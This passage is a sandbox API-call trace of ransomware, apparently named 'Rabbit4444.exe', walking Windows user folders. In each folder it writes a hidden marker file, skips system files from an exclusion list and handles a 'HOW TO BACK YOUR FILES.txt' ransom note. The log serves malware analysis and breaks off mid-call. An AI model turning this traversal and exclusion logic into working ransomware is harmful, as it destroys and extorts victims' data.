GetCurrentThreadId () returned 0xd98 [0068.568] RtlInterlockedPopEntrySList (in: ListHead=0xf68b0 | out: ListHead=0xf68b0) returned 0x122008 [0068.568] lstrcpynW (in: lpString1=0x130eb38, lpString2="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.Windows.Cortana_cw5n1h2txyewy\\AC\\Microsoft", iMaxLength=2048 | out: lpString1="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.Windows.Cortana_cw5n1h2txyewy\\AC\\Microsoft") returned="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.Windows.Cortana_cw5n1h2txyewy\\AC\\Microsoft" [0068.568] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x123680 | out: hHeap=0xe0000) returned 1 [0068.568] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x122000 | out: hHeap=0xe0000) returned 1 [0068.568] lstrcatW (in: lpString1="", lpString2="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.Windows.Cortana_cw5n1h2txyewy\\AC\\Microsoft" | out: lpString1="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.Windows.Cortana_cw5n1h2txyewy\\AC\\Microsoft") returned="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.Windows.Cortana_cw5n1h2txyewy\\AC\\Microsoft" [0068.568] lstrcatW (in: lpString1="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.Windows.Cortana_cw5n1h2txyewy\\AC\\Microsoft", lpString2="\\" | out: lpString1="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.Windows.Cortana_cw5n1h2txyewy\\AC\\Microsoft\\") returned="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.Windows.Cortana_cw5n1h2txyewy\\AC\\Microsoft\\" [0068.568] lstrcatW (in: lpString1="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.Windows.Cortana_cw5n1h2txyewy\\AC\\Microsoft\\", lpString2=".BFC0E91B00AE8A0620D3" | out: lpString1="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.Windows.Cortana_cw5n1h2txyewy\\AC\\Microsoft\\.BFC0E91B00AE8A0620D3") returned="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.Windows.Cortana_cw5n1h2txyewy\\AC\\Microsoft\\.BFC0E91B00AE8A0620D3" [0068.568] CreateFileW (lpFileName="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.Windows.Cortana_cw5n1h2txyewy\\AC\\Microsoft\\.BFC0E91B00AE8A0620D3" (normalized: "c:\\users\\fd1hvy\\appdata\\local\\packages\\microsoft.windows.cortana_cw5n1h2txyewy\\ac\\microsoft\\.bfc0e91b00ae8a0620d3"), dwDesiredAccess=0xe0003, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x8a000000, hTemplateFile=0x0) returned 0x228 [0068.570] WriteFile (in: hFile=0x228, lpBuffer=0x1008b4*, nNumberOfBytesToWrite=0x3d4, lpNumberOfBytesWritten=0x130caf8, lpOverlapped=0x0 | out: lpBuffer=0x1008b4*, lpNumberOfBytesWritten=0x130caf8*=0x3d4, lpOverlapped=0x0) returned 1 [0068.574] FlushFileBuffers (hFile=0x228) returned 1 [0068.575] SetFileAttributesW (lpFileName="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.Windows.Cortana_cw5n1h2txyewy\\AC\\Microsoft\\.BFC0E91B00AE8A0620D3", dwFileAttributes=0x82) returned 1 [0068.575] CloseHandle (hObject=0x228) returned 1 [0068.576] lstrlenW (lpString="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.Windows.Cortana_cw5n1h2txyewy\\AC\\Microsoft") returned 91 [0068.576] lstrcatW (in: lpString1="", lpString2="\\*" | out: lpString1="\\*") returned="\\*" [0068.576] FindFirstFileW (in: lpFileName="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.Windows.Cortana_cw5n1h2txyewy\\AC\\Microsoft\\*", lpFindFileData=0x130dfe8 | out: lpFindFileData=0x130dfe8*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0x823493b7, ftCreationTime.dwHighDateTime=0x1d32714, ftLastAccessTime.dwLowDateTime=0xd036400a, ftLastAccessTime.dwHighDateTime=0x1d47ca3, ftLastWriteTime.dwLowDateTime=0xf230dabb, ftLastWriteTime.dwHighDateTime=0x1d54052, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x102510 [0068.576] lstrcmpiW (lpString1=".", lpString2="HOW TO BACK YOUR FILES.txt") returned -1 [0068.576] lstrcmpiW (lpString1=".", lpString2=".BFC0E91B00AE8A0620D3") returned -1 [0068.576] lstrcmpiW (lpString1=".", lpString2="Rabbit4444.exe") returned -1 [0068.576] lstrcmpiW (lpString1=".", lpString2=".") returned 0 [0068.576] FindNextFileW (in: hFindFile=0x102510, lpFindFileData=0x130dfe8 | out: lpFindFileData=0x130dfe8*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0x823493b7, ftCreationTime.dwHighDateTime=0x1d32714, ftLastAccessTime.dwLowDateTime=0xd036400a, ftLastAccessTime.dwHighDateTime=0x1d47ca3, ftLastWriteTime.dwLowDateTime=0xf230dabb, ftLastWriteTime.dwHighDateTime=0x1d54052, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0068.576] lstrcmpiW (lpString1="..", lpString2="HOW TO BACK YOUR FILES.txt") returned -1 [0068.576] lstrcmpiW (lpString1="..", lpString2=".BFC0E91B00AE8A0620D3") returned -1 [0068.576] lstrcmpiW (lpString1="..", lpString2="Rabbit4444.exe") returned -1 [0068.576] lstrcmpiW (lpString1="..", lpString2=".") returned 1 [0068.576] lstrcmpiW (lpString1="..", lpString2="..") returned 0 [0068.576] FindNextFileW (in: hFindFile=0x102510, lpFindFileData=0x130dfe8 | out: lpFindFileData=0x130dfe8*(dwFileAttributes=0x2, ftCreationTime.dwLowDateTime=0xf230dabb, ftCreationTime.dwHighDateTime=0x1d54052, ftLastAccessTime.dwLowDateTime=0xf230dabb, ftLastAccessTime.dwHighDateTime=0x1d54052, ftLastWriteTime.dwLowDateTime=0xf2333cdc, ftLastWriteTime.dwHighDateTime=0x1d54052, nFileSizeHigh=0x0, nFileSizeLow=0x3d4, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".BFC0E91B00AE8A0620D3", cAlternateFileName="BFC0E9~1")) returned 1 [0068.576] lstrcmpiW (lpString1=".BFC0E91B00AE8A0620D3", lpString2="HOW TO BACK YOUR FILES.txt") returned -1 [0068.576] lstrcmpiW (lpString1=".BFC0E91B00AE8A0620D3", lpString2=".BFC0E91B00AE8A0620D3") returned 0 [0068.576] FindNextFileW (in: hFindFile=0x102510, lpFindFileData=0x130dfe8 | out: lpFindFileData=0x130dfe8*(dwFileAttributes=0x2014, ftCreationTime.dwLowDateTime=0xc4855d2d, ftCreationTime.dwHighDateTime=0x1d32714, ftLastAccessTime.dwLowDateTime=0xc4855d2d, ftLastAccessTime.dwHighDateTime=0x1d32714, ftLastWriteTime.dwLowDateTime=0xc487bf98, ftLastWriteTime.dwHighDateTime=0x1d32714, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="CryptnetUrlCache", cAlternateFileName="CRYPTN~1")) returned 1 [0068.576] lstrcmpiW (lpString1="CryptnetUrlCache", lpString2="HOW TO BACK YOUR FILES.txt") returned -1 [0068.576] lstrcmpiW (lpString1="CryptnetUrlCache", lpString2=".BFC0E91B00AE8A0620D3") returned 1 [0068.577] lstrcmpiW (lpString1="CryptnetUrlCache", lpString2="Rabbit4444.exe") returned -1 [0068.577] lstrcmpiW (lpString1="CryptnetUrlCache", lpString2=".") returned 1 [0068.577] lstrcmpiW (lpString1="CryptnetUrlCache", lpString2="..") returned 1 [0068.577] lstrcmpiW (lpString1="CryptnetUrlCache", lpString2="windows") returned -1 [0068.577] lstrcmpiW (lpString1="CryptnetUrlCache", lpString2="bootmgr") returned 1 [0068.577] lstrcmpiW (lpString1="CryptnetUrlCache", lpString2="pagefile.sys") returned -1 [0068.577] lstrcmpiW (lpString1="CryptnetUrlCache", lpString2="boot") returned 1 [0068.577] lstrcmpiW (lpString1="CryptnetUrlCache", lpString2="ids.txt") returned -1 [0068.577] lstrcmpiW (lpString1="CryptnetUrlCache", lpString2="NTUSER.DAT") returned -1 [0068.577] lstrcpyW (in: lpString1=0x130ebf0, lpString2="CryptnetUrlCache" | out: lpString1="CryptnetUrlCache") returned="CryptnetUrlCache" [0068.577] SetFileAttributesW (lpFileName="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.Windows.Cortana_cw5n1h2txyewy\\AC\\Microsoft\\CryptnetUrlCache", dwFileAttributes=0x2010) returned 1 [0068.578] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x0, Size=0x13) returned 0x121fe0 [0068.578] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x0, Size=0xda) returned 0x126308 [0068.578] RtlInterlockedPushEntrySList (in: ListHead=0xf68b0, ListEntry=0x121fe8 | out: ListHead=0xf68b0, ListEntry=0x121fe8) returned 0x122368 [0068.578] FindNextFileW (in: hFindFile=0x102510, lpFindFileData=0x130dfe8 | out: lpFindFileData=0x130dfe8*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0xc370cc00, ftCreationTime.dwHighDateTime=0x1d32714, ftLastAccessTime.dwLowDateTime=0xc370cc00, ftLastAccessTime.dwHighDateTime=0x1d32714, ftLastWriteTime.dwLowDateTime=0xc370cc00, ftLastWriteTime.dwHighDateTime=0x1d32714, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="Internet Explorer", cAlternateFileName="INTERN~1")) returned 1 [0068.578] lstrcmpiW (lpString1="Internet Explorer", lpString2="HOW TO BACK YOUR FILES.txt") returned 1 [0068.578] lstrcmpiW (lpString1="Internet Explorer", lpString2=".BFC0E91B00AE8A0620D3") returned 1 [0068.578] lstrcmpiW (lpString1="Internet Explorer", lpString2="Rabbit4444.exe") returned -1 [0068.578] lstrcmpiW (lpString1="Internet Explorer", lpString2=".") returned 1 [0068.578] lstrcmpiW (lpString1="Internet Explorer", lpString2="..") returned 1 [0068.578] lstrcmpiW (lpString1="Internet Explorer", lpString2="windows") returned -1 [0068.578] lstrcmpiW (lpString1="Internet Explorer", lpString2="bootmgr") returned 1 [0068.578] lstrcmpiW (lpString1="Internet Explorer", lpString2="pagefile.sys") returned -1 [0068.578] lstrcmpiW (lpString1="Internet Explorer", lpString2="boot") returned 1 [0068.578] lstrcmpiW (lpString1="Internet Explorer", lpString2="ids.txt") returned 1 [0068.578] lstrcmpiW (lpString1="Internet Explorer", lpString2="NTUSER.DAT") returned -1 [0068.578] lstrcpyW (in: lpString1=0x130ebf0, lpString2="Internet Explorer" | out: lpString1="Internet Explorer") returned="Internet Explorer" [0068.578] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x0, Size=0x13) returned 0x122240 [0068.578] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x0, Size=0xdc) returned 0x126050 [0068.578] RtlInterlockedPushEntrySList (in: ListHead=0xf68b0, ListEntry=0x122248 | out: ListHead=0xf68b0, ListEntry=0x122248) returned 0x121fe8 [0068.578] FindNextFileW (in: hFindFile=0x102510, lpFindFileData=0x130dfe8 | out: lpFindFileData=0x130dfe8*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0x823493b7, ftCreationTime.dwHighDateTime=0x1d32714, ftLastAccessTime.dwLowDateTime=0x823493b7, ftLastAccessTime.dwHighDateTime=0x1d32714, ftLastWriteTime.dwLowDateTime=0x823493b7, ftLastWriteTime.dwHighDateTime=0x1d32714, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="Windows", cAlternateFileName="")) returned 1 [0068.578] lstrcmpiW (lpString1="Windows", lpString2="HOW TO BACK YOUR FILES.txt") returned 1 [0068.578] lstrcmpiW (lpString1="Windows", lpString2=".BFC0E91B00AE8A0620D3") returned 1 [0068.578] lstrcmpiW (lpString1="Windows", lpString2="Rabbit4444.exe") returned 1 [0068.578] lstrcmpiW (lpString1="Windows", lpString2=".") returned 1 [0068.578] lstrcmpiW (lpString1="Windows", lpString2="..") returned 1 [0068.578] lstrcmpiW (lpString1="Windows", lpString2="windows") returned 0 [0068.578] FindNextFileW (in: hFindFile=0x102510, lpFindFileData=0x130dfe8 | out: lpFindFileData=0x130dfe8*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0x823493b7, ftCreationTime.dwHighDateTime=0x1d32714, ftLastAccessTime.dwLowDateTime=0x823493b7, ftLastAccessTime.dwHighDateTime=0x1d32714, ftLastWriteTime.dwLowDateTime=0x823493b7, ftLastWriteTime.dwHighDateTime=0x1d32714, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="Windows", cAlternateFileName="")) returned 0 [0068.578] FindClose (in: hFindFile=0x102510 | out: hFindFile=0x102510) returned 1 [0068.578] lstrcpyW (in: lpString1=0x130ebf0, lpString2="HOW TO BACK YOUR FILES.txt" | out: lpString1="HOW TO BACK YOUR FILES.txt") returned="HOW TO BACK YOUR FILES.txt" [0068.578] CreateFileW (lpFileName="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.Windows.Cortana_cw5n1h2txyewy\\AC\\Microsoft\\HOW TO BACK YOUR FILES.txt" (normalized: "c:\\users\\fd1hvy\\appdata\\local\\packages\\microsoft.windows.cortana_cw5n1h2txyewy\\ac\\microsoft\\how to back your files.txt"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x228 [0068.581] CreateFileMappingW (hFile=0x228, lpFileMappingAttributes=0x0, flProtect=0x4, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0x74c, lpName=0x0) returned 0x280 [0068.581] MapViewOfFile (hFileMappingObject=0x280, dwDesiredAccess=0xf001f, dwFileOffsetHigh=0x0, dwFileOffsetLow=0x0, dwNumberOfBytesToMap=0x0) returned 0x70000 [0068.581] UnmapViewOfFile (lpBaseAddress=0x70000) returned 1 [0068.581] CloseHandle (hObject=0x280) returned 1 [0068.581] CloseHandle (hObject=0x228) returned 1 [0068.581] GetCurrentThreadId () returned 0xd98 [0068.581] RtlInterlockedPopEntrySList (in: ListHead=0xf68b0 | out: ListHead=0xf68b0) returned 0x122248 [0068.581] lstrcpynW (in: lpString1=0x130eb38, lpString2="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.Windows.Cortana_cw5n1h2txyewy\\AC\\Microsoft\\Internet Explorer", iMaxLength=2048 | out: lpString1="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.Windows.Cortana_cw5n1h2txyewy\\AC\\Microsoft\\Internet Explorer") returned="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.Windows.Cortana_cw5n1h2txyewy\\AC\\Microsoft\\Internet Explorer" [0068.581] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x126050 | out: hHeap=0xe0000) returned 1 [0068.581] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x122240 | out: hHeap=0xe0000) returned 1 [0068.581] lstrcatW (in: lpString1="", lpString2="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.Windows.Cortana_cw5n1h2txyewy\\AC\\Microsoft\\Internet Explorer" | out: lpString1="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.Windows.Cortana_cw5n1h2txyewy\\AC\\Microsoft\\Internet Explorer") returned="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.Windows.Cortana_cw5n1h2txyewy\\AC\\Microsoft\\Internet Explorer" [0068.581] lstrcatW (in: lpString1="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.Windows.Cortana_cw5n1h2txyewy\\AC\\Microsoft\\Internet Explorer", lpString2="\\" | out: lpString1="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.Windows.Cortana_cw5n1h2txyewy\\AC\\Microsoft\\Internet Explorer\\") returned="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.Windows.Cortana_cw5n1h2txyewy\\AC\\Microsoft\\Internet Explorer\\" [0068.581] lstrcatW (in: lpString1="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.Windows.Cortana_cw5n1h2txyewy\\AC\\Microsoft\\Internet Explorer\\", lpString2=".BFC0E91B00AE8A0620D3" | out: lpString1="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.Windows.Cortana_cw5n1h2txyewy\\AC\\Microsoft\\Internet Explorer\\.BFC0E91B00AE8A0620D3") returned="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.Windows.Cortana_cw5n1h2txyewy\\AC\\Microsoft\\Internet Explorer\\.BFC0E91B00AE8A0620D3" [0068.581] CreateFileW (lpFileName="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.Windows.Cortana_cw5n1h2txyewy\\AC\\Microsoft\\Internet Explorer\\.BFC0E91B00AE8A0620D3" (normalized: "c:\\users\\fd1hvy\\appdata\\local\\packages\\microsoft.windows.cortana_cw5n1h2txyewy\\ac\\microsoft\\internet explorer\\.bfc0e91b00ae8a0620d3"), dwDesiredAccess=0xe0003, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x8a000000, hTemplateFile=0x0) returned 0x228 [0068.597] WriteFile (in: hFile=0x228, lpBuffer=0x1008b4*, nNumberOfBytesToWrite=0x3d4, lpNumberOfBytesWritten=0x130caf8, lpOverlapped=0x0 | out: lpBuffer=0x1008b4*, lpNumberOfBytesWritten=0x130caf8*=0x3d4, lpOverlapped=0x0) returned 1 [0068.599] FlushFileBuffers (hFile=0x228) returned 1 [0068.600] SetFileAttributesW (lpFileName="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.Windows.Cortana_cw5n1h2txyewy\\AC\\Microsoft\\Internet Explorer\\.BFC0E91B00AE8A0620D3", dwFileAttributes=0x82) returned 1 [0068.600] CloseHandle (hObject=0x228) returned 1 [0068.601] lstrlenW (lpString="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.Windows.Cortana_cw5n1h2txyewy\\AC\\Microsoft\\Internet Explorer") returned 109 [0068.601] lstrcatW (in: lpString1="", lpString2="\\*" | out: lpString1="\\*") returned="\\*" [0068.601] FindFirstFileW (in: lpFileName="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.Windows.Cortana_cw5n1h2txyewy\\AC\\Microsoft\\Internet Explorer\\*", lpFindFileData=0x130dfe8 | out: lpFindFileData=0x130dfe8*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0xc370cc00, ftCreationTime.dwHighDateTime=0x1d32714, ftLastAccessTime.dwLowDateTime=0xc370cc00, ftLastAccessTime.dwHighDateTime=0x1d32714, ftLastWriteTime.dwLowDateTime=0xf235a241, ftLastWriteTime.dwHighDateTime=0x1d54052, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x102410 [0068.601] lstrcmpiW (lpString1=".", lpString2="HOW TO BACK YOUR FILES.txt") returned -1 [0068.601] lstrcmpiW (lpString1=".", lpString2=".BFC0E91B00AE8A0620D3") returned -1 [0068.601] lstrcmpiW (lpString1=".", lpString2="Rabbit4444.exe") returned -1 [0068.601] lstrcmpiW (lpString1=".", lpString2=".") returned 0 [0068.601] FindNextFileW (in: hFindFile=0x102410, lpFindFileData=0x130dfe8 | out: lpFindFileData=0x130dfe8*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0xc370cc00, ftCreationTime.dwHighDateTime=0x1d32714, ftLastAccessTime.dwLowDateTime=0xc370cc00, ftLastAccessTime.dwHighDateTime=0x1d32714, ftLastWriteTime.dwLowDateTime=0xf235a241, ftLastWriteTime.dwHighDateTime=0x1d54052, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0068.601] lstrcmpiW (lpString1="..", lpString2="HOW TO BACK YOUR FILES.txt") returned -1 [0068.601] lstrcmpiW (lpString1="..", lpString2=".BFC0E91B00AE8A0620D3") returned -1 [0068.601] lstrcmpiW (lpString1="..", lpString2="Rabbit4444.exe") returned -1 [0068.601] lstrcmpiW (lpString1="..", lpString2=".") returned 1 [0068.601] lstrcmpiW (lpString1="..", lpString2="..") returned 0 [0068.601] FindNextFileW (in: hFindFile=0x102410, lpFindFileData=0x130dfe8 | out: lpFindFileData=0x130dfe8*(dwFileAttributes=0x2, ftCreationTime.dwLowDateTime=0xf2333cdc, ftCreationTime.dwHighDateTime=0x1d54052, ftLastAccessTime.dwLowDateTime=0xf2333cdc, ftLastAccessTime.dwHighDateTime=0x1d54052, ftLastWriteTime.dwLowDateTime=0xf235a241, ftLastWriteTime.dwHighDateTime=0x1d54052, nFileSizeHigh=0x0, nFileSizeLow=0x3d4, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".BFC0E91B00AE8A0620D3", cAlternateFileName="BFC0E9~1")) returned 1 [0068.601] lstrcmpiW (lpString1=".BFC0E91B00AE8A0620D3", lpString2="HOW TO BACK YOUR FILES.txt") returned -1 [0068.601] lstrcmpiW (lpString1=".BFC0E91B00AE8A0620D3", lpString2=".BFC0E91B00AE8A0620D3") returned 0 [0068.602] FindNextFileW (in: hFindFile=0x102410, lpFindFileData=0x130dfe8 | out: lpFindFileData=0x130dfe8*(dwFileAttributes=0x2016, ftCreationTime.dwLowDateTime=0xc370cc00, ftCreationTime.dwHighDateTime=0x1d32714, ftLastAccessTime.dwLowDateTime=0xc370cc00, ftLastAccessTime.dwHighDateTime=0x1d32714, ftLastWriteTime.dwLowDateTime=0xc370cc00, ftLastWriteTime.dwHighDateTime=0x1d32714, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="DOMStore", cAlternateFileName="")) returned 1 [0068.602] lstrcmpiW (lpString1="DOMStore", lpString2="HOW TO BACK YOUR FILES.txt") returned -1 [0068.602] lstrcmpiW (lpString1="DOMStore", lpString2=".BFC0E91B00AE8A0620D3") returned 1 [0068.602] lstrcmpiW (lpString1="DOMStore", lpString2="Rabbit4444.exe") returned -1 [0068.602] lstrcmpiW (lpString1="DOMStore", lpString2=".") returned 1 [0068.602] lstrcmpiW (lpString1="DOMStore", lpString2="..") returned 1 [0068.602] lstrcmpiW (lpString1="DOMStore", lpString2="windows") returned -1 [0068.602] lstrcmpiW (lpString1="DOMStore", lpString2="bootmgr") returned 1 [0068.602] lstrcmpiW (lpString1="DOMStore", lpString2="pagefile.sys") returned -1 [0068.602] lstrcmpiW (lpString1="DOMStore", lpString2="boot") returned 1 [0068.602] lstrcmpiW (lpString1="DOMStore", lpString2="ids.txt") returned -1 [0068.602] lstrcmpiW (lpString1="DOMStore", lpString2="NTUSER.DAT") returned -1 [0068.602] lstrcpyW (in: lpString1=0x130ec14, lpString2="DOMStore" | out: lpString1="DOMStore") returned="DOMStore" [0068.602] SetFileAttributesW (lpFileName="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.Windows.Cortana_cw5n1h2txyewy\\AC\\Microsoft\\Internet Explorer\\DOMStore", dwFileAttributes=0x2012) returned 1 [0068.602] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x0, Size=0x13) returned 0x122280 [0068.602] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x0, Size=0xee) returned 0x11fe30 [0068.602] RtlInterlockedPushEntrySList (in: ListHead=0xf68b0, ListEntry=0x122288 | out: ListHead=0xf68b0, ListEntry=0x122288) returned 0x121fe8 [0068.602] FindNextFileW (in: hFindFile=0x102410, lpFindFileData=0x130dfe8 | out: lpFindFileData=0x130dfe8*(dwFileAttributes=0x2016, ftCreationTime.dwLowDateTime=0xc370cc00, ftCreationTime.dwHighDateTime=0x1d32714, ftLastAccessTime.dwLowDateTime=0xc370cc00, ftLastAccessTime.dwHighDateTime=0x1d32714, ftLastWriteTime.dwLowDateTime=0xc370cc00, ftLastWriteTime.dwHighDateTime=0x1d32714, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="DOMStore", cAlternateFileName="")) returned 0 [0068.602] FindClose (in: hFindFile=0x102410 | out: hFindFile=0x102410) returned 1 [0068.602] lstrcpyW (in: lpString1=0x130ec14, lpString2="HOW TO BACK YOUR FILES.txt" | out: lpString1="HOW TO BACK YOUR FILES.txt") returned="HOW TO BACK YOUR FILES.txt" [0068.602] CreateFileW (lpFileName="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.Windows.Cortana_cw5n1h2txyewy\\AC\\Microsoft\\Internet Explorer\\HOW TO BACK YOUR FILES.txt" (normalized: "c:\\users\\fd1hvy\\appdata\\local\\packages\\microsoft.windows.cortana_cw5n1h2txyewy\\ac\\microsoft\\internet explorer\\how to back your files.txt"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x228 [0068.605] CreateFileMappingW (hFile=0x228, lpFileMappingAttributes=0x0, flProtect=0x4, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0x74c, lpName=0x0) returned 0x280 [0068.605] MapViewOfFile (hFileMappingObject=0x280, dwDesiredAccess=0xf001f, dwFileOffsetHigh=0x0, dwFileOffsetLow=0x0, dwNumberOfBytesToMap=0x0) returned 0x70000 [0068.605] UnmapViewOfFile (lpBaseAddress=0x70000) returned 1 [0068.606] CloseHandle (hObject=0x280) returned 1 [0068.606] CloseHandle (hObject=0x228) returned 1 [0068.606] GetCurrentThreadId () returned 0xd98 [0068.606] RtlInterlockedPopEntrySList (in: ListHead=0xf68b0 | out: ListHead=0xf68b0) returned 0x122288 [0068.606] lstrcpynW (in: lpString1=0x130eb38, lpString2="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.Windows.Cortana_cw5n1h2txyewy\\AC\\Microsoft\\Internet Explorer\\DOMStore", iMaxLength=2048 | out: lpString1="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.Windows.Cortana_cw5n1h2txyewy\\AC\\Microsoft\\Internet Explorer\\DOMStore") returned="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.Windows.Cortana_cw5n1h2txyewy\\AC\\Microsoft\\Internet Explorer\\DOMStore" [0068.606] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x11fe30 | out: hHeap=0xe0000) returned 1 [0068.606] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x122280 | out: hHeap=0xe0000) returned 1 [0068.606] lstrcatW (in: lpString1="", lpString2="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.Windows.Cortana_cw5n1h2txyewy\\AC\\Microsoft\\Internet Explorer\\DOMStore" | out: lpString1="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.Windows.Cortana_cw5n1h2txyewy\\AC\\Microsoft\\Internet Explorer\\DOMStore") returned="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.Windows.Cortana_cw5n1h2txyewy\\AC\\Microsoft\\Internet Explorer\\DOMStore" [0068.606] lstrcatW (in: lpString1="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.Windows.Cortana_cw5n1h2txyewy\\AC\\Microsoft\\Internet Explorer\\DOMStore", lpString2="\\" | out: lpString1="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.Windows.Cortana_cw5n1h2txyewy\\AC\\Microsoft\\Internet Explorer\\DOMStore\\") returned="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.Windows.Cortana_cw5n1h2txyewy\\AC\\Microsoft\\Internet Explorer\\DOMStore\\" [0068.606] lstrcatW (in: lpString1="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.Windows.Cortana_cw5n1h2txyewy\\AC\\Microsoft\\Internet Explorer\\DOMStore\\", lpString2=".BFC0E91B00AE8A0620D3" | out: lpString1="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.Windows.Cortana_cw5n1h2txyewy\\AC\\Microsoft\\Internet Explorer\\DOMStore\\.BFC0E91B00AE8A0620D3") returned="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.Windows.Cortana_cw5n1h2txyewy\\AC\\Microsoft\\Internet Explorer\\DOMStore\\.BFC0E91B00AE8A0620D3" [0068.606] CreateFileW (lpFileName="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.Windows.Cortana_cw5n1h2txyewy\\AC\\Microsoft\\Internet Explorer\\DOMStore\\.BFC0E91B00AE8A0620D3" (normalized: 